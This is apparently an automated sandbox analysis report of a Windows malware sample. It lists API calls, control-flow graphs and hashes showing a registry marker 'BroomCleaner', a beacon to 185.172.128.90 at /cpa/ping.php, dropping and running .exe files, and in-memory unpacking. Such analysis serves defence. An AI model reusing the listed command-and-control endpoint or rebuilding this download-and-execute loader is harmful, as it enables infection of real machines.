                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
                                                                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
                                                                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3070066007-0
                                                                                                                                                                                                                              • Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                                                                                              • Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1820 4139e7-4139f3 call 4177fa 1823 413a15-413a21 call 413a6c ExitProcess 1820->1823 1824 4139f5-413a03 GetPEB 1820->1824 1824->1823 1825 413a05-413a0f GetCurrentProcess TerminateProcess 1824->1825 1825->1823
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 040F5BFE
                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 040F5C1E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_40f5000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction ID: 261877529ea2fb54d62a735033cd39f8f924ec94d314ab2a8d179d940bddd4d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49F06231110711BFE7203AF59C8DA6E76E8AF49625F100578E743A58C1DB70F84646A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1447 41a242-41a272 call 419fa5 1450 41a274-41a27f call 41236e 1447->1450 1451 41a28d-41a299 call 41e6a7 1447->1451 1456 41a281-41a288 call 412381 1450->1456 1457 41a2b2-41a2fb call 419f10 1451->1457 1458 41a29b-41a2b0 call 41236e call 412381 1451->1458 1468 41a564-41a56a 1456->1468 1466 41a368-41a371 GetFileType 1457->1466 1467 41a2fd-41a306 1457->1467 1458->1456 1472 41a373-41a3a4 GetLastError call 41234b CloseHandle 1466->1472 1473 41a3ba-41a3bd 1466->1473 1470 41a308-41a30c 1467->1470 1471 41a33d-41a363 GetLastError call 41234b 1467->1471 1470->1471 1477 41a30e-41a33b call 419f10 1470->1477 1471->1456 1472->1456 1484 41a3aa-41a3b5 call 412381 1472->1484 1475 41a3c6-41a3cc 1473->1475 1476 41a3bf-41a3c4 1473->1476 1480 41a3d0-41a41e call 41e5f0 1475->1480 1481 41a3ce 1475->1481 1476->1480 1477->1466 1477->1471 1490 41a420-41a42c call 41a121 1480->1490 1491 41a42e-41a452 call 419cc3 1480->1491 1481->1480 1484->1456 1490->1491 1498 41a456-41a460 call 4163fd 1490->1498 1496 41a465-41a4a8 1491->1496 1497 41a454 1491->1497 1500 41a4c9-41a4d7 1496->1500 1501 41a4aa-41a4ae 1496->1501 1497->1498 1498->1468 1504 41a562 1500->1504 1505 41a4dd-41a4e1 1500->1505 1501->1500 1503 41a4b0-41a4c4 1501->1503 1503->1500 1504->1468 1505->1504 1506 41a4e3-41a516 CloseHandle call 419f10 1505->1506 1509 41a518-41a544 GetLastError call 41234b call 41e7b9 1506->1509 1510 41a54a-41a55e 1506->1510 1509->1510 1510->1504
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A356
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A35D
                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 0041A369
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A373
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A37C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041A39C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0041A4E6
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A518
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A51F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                              • Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
                                                                                                                                                                                                                              • Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1515 4192ad-4192bd 1516 4192d7-4192d9 1515->1516 1517 4192bf-4192d2 call 41236e call 412381 1515->1517 1519 419641-41964e call 41236e call 412381 1516->1519 1520 4192df-4192e5 1516->1520 1533 419659 1517->1533 1538 419654 call 410905 1519->1538 1520->1519 1523 4192eb-419316 1520->1523 1523->1519 1526 41931c-419325 1523->1526 1529 419327-41933a call 41236e call 412381 1526->1529 1530 41933f-419341 1526->1530 1529->1538 1531 419347-41934b 1530->1531 1532 41963d-41963f 1530->1532 1531->1532 1536 419351-419355 1531->1536 1537 41965c-419661 1532->1537 1533->1537 1536->1529 1540 419357-41936e 1536->1540 1538->1533 1543 419370-419373 1540->1543 1544 41938b-419394 1540->1544 1546 419375-41937b 1543->1546 1547 41937d-419386 1543->1547 1548 4193b2-4193bc 1544->1548 1549 419396-4193ad call 41236e call 412381 call 410905 1544->1549 1546->1547 1546->1549 1552 419427-419441 1547->1552 1550 4193c3-4193e1 call 417a45 call 41629a * 2 1548->1550 1551 4193be-4193c0 1548->1551 1581 419574 1549->1581 1585 4193e3-4193f9 call 412381 call 41236e 1550->1585 1586 4193fe-419424 call 419800 1550->1586 1551->1550 1554 419515-41951e call 4210f9 1552->1554 1555 419447-419457 1552->1555 1568 419591 1554->1568 1569 419520-419532 1554->1569 1555->1554 1558 41945d-41945f 1555->1558 1558->1554 1562 419465-41948b 1558->1562 1562->1554 1566 419491-4194a4 1562->1566 1566->1554 1571 4194a6-4194a8 1566->1571 1573 419595-4195ad ReadFile 1568->1573 1569->1568 1574 419534-419543 GetConsoleMode 1569->1574 1571->1554 1576 4194aa-4194d5 1571->1576 1578 419609-419614 GetLastError 1573->1578 1579 4195af-4195b5 1573->1579 1574->1568 1580 419545-419549 1574->1580 1576->1554 1584 4194d7-4194ea 1576->1584 1587 419616-419628 call 412381 call 41236e 1578->1587 1588 41962d-419630 1578->1588 1579->1578 1589 4195b7 1579->1589 1580->1573 1582 41954b-419565 ReadConsoleW 1580->1582 1583 419577-419581 call 41629a 1581->1583 1590 419567 GetLastError 1582->1590 1591 419586-41958f 1582->1591 1583->1537 1584->1554 1595 4194ec-4194ee 1584->1595 1585->1581 1586->1552 1587->1581 1592 419636-419638 1588->1592 1593 41956d-419573 call 41234b 1588->1593 1599 4195ba-4195cc 1589->1599 1590->1593 1591->1599 1592->1583 1593->1581 1595->1554 1602 4194f0-419510 1595->1602 1599->1583 1606 4195ce-4195d2 1599->1606 1602->1554 1607 4195d4-4195e4 call 418fc9 1606->1607 1608 4195eb-4195f6 1606->1608 1620 4195e7-4195e9 1607->1620 1614 419602-419607 call 418e09 1608->1614 1615 4195f8 call 419119 1608->1615 1621 4195fd-419600 1614->1621 1615->1621 1620->1583 1621->1620
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
                                                                                                                                                                                                                              • Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1623 5b6003c-5b60047 1624 5b6004c-5b60263 call 5b60a3f call 5b60e0f call 5b60d90 VirtualAlloc 1623->1624 1625 5b60049 1623->1625 1640 5b60265-5b60289 call 5b60a69 1624->1640 1641 5b6028b-5b60292 1624->1641 1625->1624 1646 5b602ce-5b603c2 VirtualProtect call 5b60cce call 5b60ce7 1640->1646 1643 5b602a1-5b602b0 1641->1643 1645 5b602b2-5b602cc 1643->1645 1643->1646 1645->1643 1652 5b603d1-5b603e0 1646->1652 1653 5b603e2-5b60437 call 5b60ce7 1652->1653 1654 5b60439-5b604b8 VirtualFree 1652->1654 1653->1652 1656 5b605f4-5b605fe 1654->1656 1657 5b604be-5b604cd 1654->1657 1660 5b60604-5b6060d 1656->1660 1661 5b6077f-5b60789 1656->1661 1659 5b604d3-5b604dd 1657->1659 1659->1656 1665 5b604e3-5b60505 LoadLibraryA 1659->1665 1660->1661 1666 5b60613-5b60637 1660->1666 1663 5b607a6-5b607b0 1661->1663 1664 5b6078b-5b607a3 1661->1664 1667 5b607b6-5b607cb 1663->1667 1668 5b6086e-5b608be LoadLibraryA 1663->1668 1664->1663 1669 5b60517-5b60520 1665->1669 1670 5b60507-5b60515 1665->1670 1671 5b6063e-5b60648 1666->1671 1672 5b607d2-5b607d5 1667->1672 1675 5b608c7-5b608f9 1668->1675 1673 5b60526-5b60547 1669->1673 1670->1673 1671->1661 1674 5b6064e-5b6065a 1671->1674 1676 5b607d7-5b607e0 1672->1676 1677 5b60824-5b60833 1672->1677 1678 5b6054d-5b60550 1673->1678 1674->1661 1679 5b60660-5b6066a 1674->1679 1680 5b60902-5b6091d 1675->1680 1681 5b608fb-5b60901 1675->1681 1682 5b607e4-5b60822 1676->1682 1683 5b607e2 1676->1683 1687 5b60839-5b6083c 1677->1687 1684 5b60556-5b6056b 1678->1684 1685 5b605e0-5b605ef 1678->1685 1686 5b6067a-5b60689 1679->1686 1681->1680 1682->1672 1683->1677 1688 5b6056f-5b6057a 1684->1688 1689 5b6056d 1684->1689 1685->1659 1690 5b60750-5b6077a 1686->1690 1691 5b6068f-5b606b2 1686->1691 1687->1668 1692 5b6083e-5b60847 1687->1692 1694 5b6057c-5b60599 1688->1694 1695 5b6059b-5b605bb 1688->1695 1689->1685 1690->1671 1696 5b606b4-5b606ed 1691->1696 1697 5b606ef-5b606fc 1691->1697 1698 5b6084b-5b6086c 1692->1698 1699 5b60849 1692->1699 1706 5b605bd-5b605db 1694->1706 1695->1706 1696->1697 1700 5b606fe-5b60748 1697->1700 1701 5b6074b 1697->1701 1698->1687 1699->1668 1700->1701 1701->1686 1706->1678
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05B6024D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction ID: e09016a99a90e5811c8eec0892535db24aa1306db852cba515d0009b53bff698
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D526974A01229DFDB64CF59C984BACBBB1BF09304F1480E9E94DAB351DB34AA85CF15
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1753 42615a-426191 call 42780c RegCreateKeyExA 1756 426222-426226 1753->1756 1757 426197-4261aa 1753->1757 1759 426231-426241 1756->1759 1760 426228-42622b RegCloseKey 1756->1760 1758 4261ad-4261b2 1757->1758 1758->1758 1761 4261b4-4261d3 call 402c71 1758->1761 1760->1759 1764 4261d6-4261db 1761->1764 1764->1764 1765 4261dd-426215 call 402c71 RegSetValueExA call 402bef 1764->1765 1769 42621a-42621d call 402bef 1765->1769 1769->1756
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0042615F
                                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                              • API String ID: 1996196666-529226407
                                                                                                                                                                                                                              • Opcode ID: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
                                                                                                                                                                                                                              • Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1771 426510-42651f 1772 426521-426527 1771->1772 1772->1772 1773 426529-42655c ShellExecuteExA 1772->1773 1774 426575-426581 call 402bef 1773->1774 1775 42655e-42656f WaitForSingleObject CloseHandle 1773->1775 1775->1774
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0042656F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 3837156514-4119554291
                                                                                                                                                                                                                              • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1778 426242-426267 CreateFileA 1779 426284-42628a 1778->1779 1780 426269-42627e WriteFile FindCloseChangeNotification 1778->1780 1780->1779
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 3805958096-4119554291
                                                                                                                                                                                                                              • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1781 4163fd-416411 call 41e84a 1784 416413-416415 1781->1784 1785 416417-41641f 1781->1785 1786 416465-416485 call 41e7b9 1784->1786 1787 416421-416428 1785->1787 1788 41642a-41642d 1785->1788 1798 416493 1786->1798 1799 416487-416491 call 41234b 1786->1799 1787->1788 1790 416435-416449 call 41e84a * 2 1787->1790 1791 41644b-41645b call 41e84a FindCloseChangeNotification 1788->1791 1792 41642f-416433 1788->1792 1790->1784 1790->1791 1791->1784 1801 41645d-416463 GetLastError 1791->1801 1792->1790 1792->1791 1803 416495-416498 1798->1803 1799->1803 1801->1786
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 490808831-0
                                                                                                                                                                                                                              • Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                                                                                              • Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1806 419767-41977f call 41e84a 1809 419781-419786 call 412381 1806->1809 1810 419792-4197a8 SetFilePointerEx 1806->1810 1817 41978c-419790 1809->1817 1812 4197b9-4197c3 1810->1812 1813 4197aa-4197b7 GetLastError call 41234b 1810->1813 1816 4197c5-4197da 1812->1816 1812->1817 1813->1817 1818 4197df-4197e4 1816->1818 1817->1818
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                                                                              • Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
                                                                                                                                                                                                                              • Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1828 4264f9-42650f SysFreeString * 2 CoUninitialize
                                                                                                                                                                                                                              APIs
